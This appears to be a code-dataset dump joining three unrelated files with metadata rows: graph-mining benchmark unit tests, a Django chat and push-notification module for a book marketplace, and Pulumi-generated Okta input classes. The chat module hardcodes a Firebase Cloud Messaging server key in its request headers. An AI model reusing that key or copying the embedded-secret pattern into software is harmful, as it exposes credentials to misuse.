file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
supp = graph_dataset_size * 0.08
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
def test_compound_min_graph_size_2_support_9_percent(self):
graph_dataset_size = 422
file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
supp = graph_dataset_size * 0.09
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
def test_compound_min_graph_size_2_support_10_percent(self):
graph_dataset_size = 422
file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
supp = graph_dataset_size * 0.1
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
def test_compound_min_graph_size_7_support_5_percent(self):
graph_dataset_size = 422
file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 7
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
def test_compound_min_graph_size_12_support_5_percent(self):
graph_dataset_size = 422
file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 12
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
def test_compound_min_graph_size_17_support_5_percent(self):
graph_dataset_size = 422
file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 17
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
def test_compound_min_graph_size_22_support_5_percent(self):
graph_dataset_size = 422
file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 22
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
def test_compound_min_graph_size_27_support_5_percent(self):
graph_dataset_size = 422
file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 27
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
def test_compound_min_graph_size_32_support_5_percent(self):
graph_dataset_size = 422
file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 32
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
def test_compound_min_graph_size_37_support_5_percent(self):
graph_dataset_size = 422
file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 37
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
def test_compound_min_graph_size_42_support_5_percent(self):
graph_dataset_size = 422
file_name = "../graphdata/benchmark_tests/Coumpound_422.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 42
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
class ChemicalBenchmarkTests(unittest.TestCase):
@classmethod
def setUpClass(self) -> None:
self.f = open("benchmarkCloseGraphOutput.txt", "w")
@classmethod
def tearDownClass(self) -> None:
self.f.close()
def updateOutput(self, results):
self.f.write(str(sorted(results)) + "\n")
def convert_results_format(self, results):
results_as_tuples = []
for result in results:
support, description, num_vertices = result[0], result[1], result[2]
results_as_tuples.append((support, description, num_vertices))
return results_as_tuples
def test_chemical_min_graph_size_2_support_3_percent(self):
graph_dataset_size = 340
file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
supp = graph_dataset_size * 0.03
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
def test_chemical_min_graph_size_2_support_4_percent(self):
graph_dataset_size = 340
file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
supp = graph_dataset_size * 0.04
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
def test_chemical_min_graph_size_2_support_5_percent(self):
graph_dataset_size = 340
file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
def test_chemical_min_graph_size_2_support_6_percent(self):
graph_dataset_size = 340
file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
supp = graph_dataset_size * 0.06
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
def test_chemical_min_graph_size_2_support_7_percent(self):
graph_dataset_size = 340
file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
supp = graph_dataset_size * 0.07
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
def test_chemical_min_graph_size_2_support_8_percent(self):
graph_dataset_size = 340
file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
supp = graph_dataset_size * 0.08
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
def test_chemical_min_graph_size_2_support_9_percent(self):
graph_dataset_size = 340
file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
supp = graph_dataset_size * 0.09
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
def test_chemical_min_graph_size_2_support_10_percent(self):
graph_dataset_size = 340
file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
supp = graph_dataset_size * 0.1
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
#End of min support tests
def test_chemical_min_graph_size_2(self):
graph_dataset_size = 340
file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
supp = graph_dataset_size * 0.45
min_size_graph = 2
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
cg.graph_dataset_stats()
results = cg._report_df.to_numpy().astype(str)
results = self.convert_results_format(results)
self.updateOutput(results)
#Start of min graph size tests
def test_chemical_min_graph_size_7_support_5_percent(self):
graph_dataset_size = 340
file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 7
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
def test_chemical_min_graph_size_12_support_5_percent(self):
graph_dataset_size = 340
file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 12
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
def test_chemical_min_graph_size_17_support_5_percent(self):
graph_dataset_size = 340
file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 17
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
def test_chemical_min_graph_size_22_support_5_percent(self):
graph_dataset_size = 340
file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 22
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
def test_chemical_min_graph_size_27_support_5_percent(self):
graph_dataset_size = 340
file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 27
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
def test_chemical_min_graph_size_32_support_5_percent(self):
graph_dataset_size = 340
file_name = "../graphdata/benchmark_tests/Chemical_340.txt"
supp = graph_dataset_size * 0.05
min_size_graph = 32
cg = closeGraph(
database_file_name=file_name,
min_support=supp,
min_num_vertices=min_size_graph
)
cg.run()
cg.time_stats()
if __name__ == '__main__':
unittest.main()
| 30.740286 | 89 | 0.625998 | 1,883 | 15,032 | 4.54222 | 0.066383 | 0.086987 | 0.115983 | 0.072489 | 0.901438 | 0.901438 | 0.901438 | 0.895241 | 0.88998 | 0.88998 | 0 | 0.037954 | 0.298896 | 15,032 | 488 | 90 | 30.803279 | 0.773603 | 0.04211 | 0 | 0.786967 | 0 | 0 | 0.097834 | 0.097068 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085213 | false | 0 | 0.005013 | 0 | 0.097744 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fbec612f4c0924bc4aad496228704801ceadf7cf | 14,379 | py | Python | bookalo/funciones_chat.py | unizar-30226-2019-08/Backend | d14e6fce293330611cd697af033823aa01a2ebfe | [
"MIT"
] | 3 | 2019-05-21T19:35:30.000Z | 2019-06-03T19:58:10.000Z | bookalo/funciones_chat.py | unizar-30226-2019-08/Backend | d14e6fce293330611cd697af033823aa01a2ebfe | [
"MIT"
] | 99 | 2019-03-14T10:22:52.000Z | 2022-03-11T23:46:08.000Z | bookalo/funciones_chat.py | unizar-30226-2019-08/Backend | d14e6fce293330611cd697af033823aa01a2ebfe | [
"MIT"
] | 4 | 2019-03-17T18:53:57.000Z | 2019-05-21T19:35:35.000Z | from django.shortcuts import render, redirect
from bookalo.pyrebase_settings import db, auth
from bookalo.models import *
from bookalo.serializers import *
#from bookalo.functions import *
from rest_framework import status, permissions
from rest_framework.decorators import api_view, permission_classes
from rest_framework.response import Response
from rest_framework.request import Request
from rest_framework.test import APIRequestFactory
from operator import itemgetter
from django.http import HttpResponse
from datetime import datetime, timedelta, timezone
from django.db.models import Q, Count
from django.contrib.gis.geoip2 import GeoIP2
from math import sin, cos, sqrt, atan2, radians
from decimal import Decimal
from .funciones_usuario import *
import itertools
import requests
import json
def get_list_tokens(user, token_to_omit):
sessions = Sesion.objects.filter(usuario=user, es_movil=True)
tokens_movil = []
for session in sessions:
if session.token != token_to_omit:
tokens_movil = tokens_movil + [session.token_fcm]
sessions = Sesion.objects.filter(usuario=user, es_movil=False)
tokens_web = []
for session in sessions:
if session.token != token_to_omit:
tokens_web = tokens_web + [session.token_fcm]
return {'movil':tokens_movil, 'web':tokens_web}
def get_list_tokens_without_sender(user, token_to_omit):
sessions = Sesion.objects.filter(usuario=user, es_movil=True)
tokens_movil = []
for session in sessions:
if session.token_fcm != token_to_omit:
tokens_movil = tokens_movil + [session.token_fcm]
sessions = Sesion.objects.filter(usuario=user, es_movil=False)
tokens_web = []
for session in sessions:
if session.token_fcm != token_to_omit:
tokens_web = tokens_web + [session.token_fcm]
return {'movil':tokens_movil, 'web':tokens_web}
def CrearChat(token,otroUserUid,productId):
user_info = auth.get_account_info(token)
user_uid = user_info['users'][0]['localId']
user = Usuario.objects.get(uid=user_uid)
otroUser = Usuario.objects.get(uid=otroUserUid)
product = Producto.objects.get(pk=int(productId))
#Comprobamos que no exista el chat previamente
try:
chat = Chat.objects.get(vendedor=otroUser, comprador=user, producto=product)
except:
chat = Chat.objects.create(vendedor=otroUser, comprador=user, producto=product)
return chat
def GetChatVendedor(user,ultimo_indice,elementos_pagina):
chats = Chat.objects.filter(vendedor=user, borrado_vendedor=False, producto__estado_venta=True)
chats_terminados = Chat.objects.filter(vendedor=user, borrado_vendedor=False, producto__estado_venta=False)
chats = list(chats) + list(chats_terminados)
ultimo_indice = int(ultimo_indice)
elementos_pagina = int(elementos_pagina)
if(elementos_pagina != -1):
chats = itertools.islice(chats, ultimo_indice, ultimo_indice + elementos_pagina)
return ChatSerializer(chats, many=True, read_only=True, context = {"user": user})
def GetChatComprador(user,ultimo_indice,elementos_pagina):
chats = Chat.objects.filter(comprador=user,borrado_comprador=False, producto__estado_venta=True)
chats_terminados = Chat.objects.filter(comprador=user,borrado_comprador=False, producto__estado_venta=False)
chats = list(chats) + list(chats_terminados)
ultimo_indice = int(ultimo_indice)
elementos_pagina = int(elementos_pagina)
if(elementos_pagina != -1):
chats = itertools.islice(chats, ultimo_indice, ultimo_indice + elementos_pagina)
return ChatSerializer(chats, many=True, read_only=True, context = {"user": user})
def CrearMensaje(token, chat_id, message):
try:
user = get_user(token)
chat = Chat.objects.get(pk=int(chat_id))
mensaje = Mensaje(texto=message, chat_asociado=chat, emisor=user)
mensaje.save()
chat.borrado_vendedor = False
chat.borrado_comprador = False
chat.save()
return mensaje
except:
return None
def CrearNotificiacion(usuario, message):
try:
NotificacionesPendientes.objects.create(usuario_pendiente=usuario, descripcion_notificacion=message)
return True
except:
return False
def GetUserMessages(chat_pk, user,ultimo_indice,elementos_pagina):
try:
try:
chat = Chat.objects.get(pk=int(chat_pk))
if chat.vendedor == user:
chat.num_pendientes_vendedor = 0
chat.save()
elif chat.comprador == user:
chat.num_pendientes_comprador = 0
chat.save()
else:
chat.save()
ultimo_indice = int(ultimo_indice)
elementos_pagina = int(elementos_pagina)
if(elementos_pagina != -1):
messages = Mensaje.objects.filter(chat_asociado__pk=chat_pk).order_by('-hora')
messages = itertools.islice(messages, ultimo_indice, ultimo_indice + elementos_pagina)
else:
messages = Mensaje.objects.filter(chat_asociado__pk=chat_pk).order_by('hora')
return MensajeSerializer(messages, many=True, read_only=True, context = {"user": user})
except:
messages = Mensaje.objects.filter(chat_asociado__pk=chat_pk).order_by('hora')
if(elementos_pagina != -1):
messages = itertools.islice(messages, ultimo_indice, ultimo_indice + elementos_pagina)
return MensajeSerializer(messages, many=True, read_only=True, context = {"user": user})
except:
return None
def GetChatInfoWeb(chat_id):
try:
chat = Chat.objects.get(pk=int(chat_id))
product = chat.producto
seller = chat.vendedor
buyer = chat.comprador
return {'comprador':UserSerializer(buyer).data, 'vendedor':UserSerializer(seller).data, 'producto': ProductoSerializer(product).data}
except:
return {'comprador': '', 'vendedor':'', 'producto': ''}
def BorradoChat(token,chatId):
user_info = auth.get_account_info(token)
user_uid = user_info['users'][0]['localId']
user = Usuario.objects.get(uid=user_uid)
chat = Chat.objects.get(id=chatId)
if chat.vendedor == user:
chat.borrado_vendedor = True
chat.save()
if chat.borrado_comprador == True:
chat.delete()
return 'Ok'
elif chat.comprador == user:
chat.borrado_comprador = True
chat.save()
if chat.borrado_vendedor == True:
chat.delete()
return 'Ok'
else:
return 'Unauthorized'
def SendFCMMessage(chat_id, message, token_emisor, emisor, soy_vendedor, receptor):
try:
headers = {"Authorization":"key=AAAARwXiWF8:APA91bEvM5nPUaBpR217T3ZjRqCGvYadxmHQXQSIgGMkWn_BeAOnnLZNv2DtVmCwF-D_sJEsh4CrDg6S0S4jl9tsImUnqzEGAssiizIF4U1h0AVsgyzzU8to0q0QlLx2cFu2673OvKuH","Content-Type":"application/json"}
URL = 'https://fcm.googleapis.com/fcm/send'
chat_obj = Chat.objects.get(pk=int(chat_id))
if chat_obj.vendedor == emisor:
chat_obj.num_pendientes_comprador = chat_obj.num_pendientes_comprador + 1
chat_obj.save()
else:
chat_obj.num_pendientes_vendedor = chat_obj.num_pendientes_vendedor + 1
chat_obj.save()
#Codigo para el receptor del mensaje
chat = ChatSerializer(chat_obj, context = {"user": receptor}).data
mensaje = MensajeSerializer(message, context = {"user": receptor}).data
tokens_receptor = get_list_tokens(receptor, "NONE")
if tokens_receptor['movil']:
data = {
"notification":{
"title":"Bookalo",
"body":"¡Hola " + receptor.nombre + "! La venta se ha cerrado para el producto " + chat_obj.producto.nombre + ". ¡Valora a " + emisor.nombre + "!",
"icon":"https://bookalo.es/media/bookalo_logo.png"
},
"registration_ids":tokens_receptor['movil'],
"data":{
"chat":chat,
"soy_vendedor":soy_vendedor,
"mensaje":mensaje,
}
}
data = json.dumps(data)
requests.post(url=URL, data=data, headers=headers)
data = {
"registration_ids":tokens_receptor['movil'],
"data":{
"chat":chat,
"soy_vendedor":soy_vendedor,
"mensaje":mensaje,
}
}
data = json.dumps(data)
requests.post(url=URL, data=data, headers=headers)
if tokens_receptor['web']:
data = {
"notification":{
"title":"Bookalo",
"body":"¡Hola " + receptor.nombre + "! La venta se ha cerrado para el producto " + chat_obj.producto.nombre + ". ¡Valora a " + emisor.nombre + "!",
"icon":"https://bookalo.es/media/bookalo_logo.png"
},
"registration_ids":tokens_receptor['web'],
"data":{
"chat":chat,
"soy_vendedor":soy_vendedor,
"mensaje":mensaje,
}
}
data = json.dumps(data)
requests.post(url=URL, data=data, headers=headers)
#Codigo para el emisor del mensaje
chat = ChatSerializer(chat_obj, context = {"user": emisor}).data
mensaje = MensajeSerializer(message, context = {"user": emisor}).data
tokens_emisor = get_list_tokens(emisor, token_emisor)
if tokens_emisor['movil']:
data = {
"notification":{
"title":"Bookalo",
"body":"¡Hola " + emisor.nombre + "! La venta se ha cerrado para el producto " + chat_obj.producto.nombre + ". ¡Valora a " + receptor.nombre + "!",
"icon":"https://bookalo.es/media/bookalo_logo.png"
},
"registration_ids":tokens_emisor['movil'],
"data":{
"chat":chat,
"soy_vendedor":not soy_vendedor,
"mensaje":mensaje,
}
}
data = json.dumps(data)
requests.post(url=URL, data=data, headers=headers)
data = {
"registration_ids":tokens_emisor['movil'],
"data":{
"chat":chat,
"soy_vendedor":not soy_vendedor,
"mensaje":mensaje,
}
}
data = json.dumps(data)
requests.post(url=URL, data=data, headers=headers)
if tokens_emisor['web']:
data = {
"notification":{
"title":"Bookalo",
"body":"¡Hola " + emisor.nombre + "! La venta se ha cerrado para el producto " + chat_obj.producto.nombre + ". ¡Valora a " + receptor.nombre + "!",
"icon":"https://bookalo.es/media/bookalo_logo.png"
},
"registration_ids":tokens_emisor['web'],
"data":{
"chat":chat,
"soy_vendedor":not soy_vendedor,
"mensaje":mensaje,
}
}
data = json.dumps(data)
requests.post(url=URL, data=data, headers=headers)
return True
except Exception as ex:
tokens_emisor = get_list_tokens(emisor, token_emisor)
data = {
"registration_ids":[tokens_emisor],
"notification":{
"title":"Bookalo: Fallo en envio de mensaje",
"body":"Un error ocurrió mientras enviabas el mensaje - " + message.texto + " -: " + str(ex)
}
}
data = json.dumps(data)
requests.post(url=URL, data=data, headers=headers)
return False
def SendFCMChatMessage(chat_id, message, token_emisor, emisor, soy_vendedor, receptor):
try:
headers = {"Authorization":"key=AAAARwXiWF8:APA91bEvM5nPUaBpR217T3ZjRqCGvYadxmHQXQSIgGMkWn_BeAOnnLZNv2DtVmCwF-D_sJEsh4CrDg6S0S4jl9tsImUnqzEGAssiizIF4U1h0AVsgyzzU8to0q0QlLx2cFu2673OvKuH","Content-Type":"application/json"}
URL = 'https://fcm.googleapis.com/fcm/send'
chat_obj = Chat.objects.get(pk=int(chat_id))
if chat_obj.vendedor == emisor:
chat_obj.num_pendientes_comprador = chat_obj.num_pendientes_comprador + 1
chat_obj.save()
else:
chat_obj.num_pendientes_vendedor = chat_obj.num_pendientes_vendedor + 1
chat_obj.save()
#Codigo para el receptor del mensaje
chat = ChatSerializer(chat_obj, context = {"user": receptor}).data
mensaje = MensajeSerializer(message, context = {"user": receptor}).data
tokens_receptor = get_list_tokens_without_sender(receptor, "NONE")
if tokens_receptor['movil']:
data = {
"notification":{
"title":emisor.nombre + ' - ' + chat_obj.producto.nombre,
"body":message.texto,
"icon":"https://bookalo.es/media/bookalo_logo.png"
},
"registration_ids":tokens_receptor['movil'],
"data":{
"chat":chat,
"soy_vendedor":not soy_vendedor,
"mensaje":mensaje,
"click_action":"FLUTTER_NOTIFICATION_CLICK",
}
}
data = json.dumps(data)
requests.post(url=URL, data=data, headers=headers)
data = {
"registration_ids":tokens_receptor['movil'],
"data":{
"chat":chat,
"soy_vendedor":not soy_vendedor,
"mensaje":mensaje,
"click_action":"FLUTTER_NOTIFICATION_CLICK",
}
}
data = json.dumps(data)
requests.post(url=URL, data=data, headers=headers)
if tokens_receptor['web']:
data = {
"notification":{
"title":emisor.nombre + ' - ' + chat_obj.producto.nombre,
"body":message.texto,
"icon":"https://bookalo.es/media/bookalo_logo.png"
},
"registration_ids":tokens_receptor['web'],
"data":{
"chat":chat,
"soy_vendedor":not soy_vendedor,
"mensaje":mensaje,
}
}
data = json.dumps(data)
requests.post(url=URL, data=data, headers=headers)
#Codigo para el emisor del mensaje
chat = ChatSerializer(chat_obj, context = {"user": emisor}).data
mensaje = MensajeSerializer(message, context = {"user": emisor}).data
tokens_emisor = get_list_tokens_without_sender(emisor, token_emisor)
if tokens_emisor['movil']:
data = {
"notification":{
"title":receptor.nombre + ' - ' + chat_obj.producto.nombre,
"body":message.texto,
"icon":"https://bookalo.es/media/bookalo_logo.png"
},
"registration_ids":tokens_emisor['movil'],
"data":{
"chat":chat,
"soy_vendedor":soy_vendedor,
"mensaje":mensaje,
}
}
data = json.dumps(data)
requests.post(url=URL, data=data, headers=headers)
data = {
"registration_ids":tokens_emisor['movil'],
"data":{
"chat":chat,
"soy_vendedor":soy_vendedor,
"mensaje":mensaje,
}
}
data = json.dumps(data)
requests.post(url=URL, data=data, headers=headers)
if tokens_emisor['web']:
data = {
"notification":{
"title":emisor.nombre + ' - ' + chat_obj.producto.nombre,
"body":message.texto,
"icon":"https://bookalo.es/media/bookalo_logo.png"
},
"registration_ids":tokens_emisor['web'],
"data":{
"chat":chat,
"soy_vendedor":soy_vendedor,
"mensaje":mensaje,
}
}
data = json.dumps(data)
requests.post(url=URL, data=data, headers=headers)
return True
except Exception as ex:
data = {
"registration_ids":[token_emisor],
"notification":{
"title":"Bookalo: Fallo en envio de mensaje",
"body":"Un error ocurrió mientras enviabas el mensaje - " + message.texto + " -: " + str(ex)
}
}
data = json.dumps(data)
requests.post(url=URL, data=data, headers=headers)
return False
| 35.679901 | 223 | 0.690104 | 1,740 | 14,379 | 5.52931 | 0.124138 | 0.020372 | 0.018917 | 0.024738 | 0.819146 | 0.784534 | 0.77019 | 0.77019 | 0.756366 | 0.742023 | 0 | 0.005514 | 0.180193 | 14,379 | 402 | 224 | 35.768657 | 0.809976 | 0.014744 | 0 | 0.72 | 0 | 0 | 0.172469 | 0.026455 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032 | false | 0 | 0.053333 | 0 | 0.141333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2242d533e148b928aed9ca66a241a15f091c0db4 | 26,960 | py | Python | sdk/python/pulumi_okta/app/_inputs.py | pulumi/pulumi-okta | 83f7617a85b3d05213901773fa4e6a151ab6076b | [
"ECL-2.0",
"Apache-2.0"
] | 5 | 2019-10-29T21:59:22.000Z | 2021-11-08T12:00:24.000Z | sdk/python/pulumi_okta/app/_inputs.py | pulumi/pulumi-okta | 83f7617a85b3d05213901773fa4e6a151ab6076b | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2020-01-06T10:28:09.000Z | 2022-03-25T19:52:40.000Z | sdk/python/pulumi_okta/app/_inputs.py | pulumi/pulumi-okta | 83f7617a85b3d05213901773fa4e6a151ab6076b | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2020-09-11T16:31:04.000Z | 2020-11-24T12:23:17.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'AutoLoginUserArgs',
'BasicAuthUserArgs',
'BookmarkUserArgs',
'OAuthGroupsClaimArgs',
'OAuthJwkArgs',
'OAuthUserArgs',
'SamlAttributeStatementArgs',
'SamlUserArgs',
'SecurePasswordStoreUserArgs',
'SwaUserArgs',
'ThreeFieldUserArgs',
'UserSchemaArrayOneOfArgs',
'UserSchemaOneOfArgs',
'GetSamlAttributeStatementArgs',
]
@pulumi.input_type
class AutoLoginUserArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class BasicAuthUserArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: ID of the Application.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the Application.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class BookmarkUserArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: ID of the Application.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the Application.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class OAuthGroupsClaimArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
type: pulumi.Input[str],
value: pulumi.Input[str],
filter_type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: Name of the claim that will be used in the token.
:param pulumi.Input[str] type: Groups claim type. Valid values: `"FILTER"`, `"EXPRESSION"`.
:param pulumi.Input[str] value: Value of the claim. Can be an Okta Expression Language statement that evaluates at the time the token is minted.
:param pulumi.Input[str] filter_type: Groups claim filter. Can only be set if type is `"FILTER"`. Valid values: `"EQUALS"`, `"STARTS_WITH"`, `"CONTAINS"`, `"REGEX"`.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "type", type)
pulumi.set(__self__, "value", value)
if filter_type is not None:
pulumi.set(__self__, "filter_type", filter_type)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Name of the claim that will be used in the token.
"""
return pulumi.get(self, "name")
@name.setter
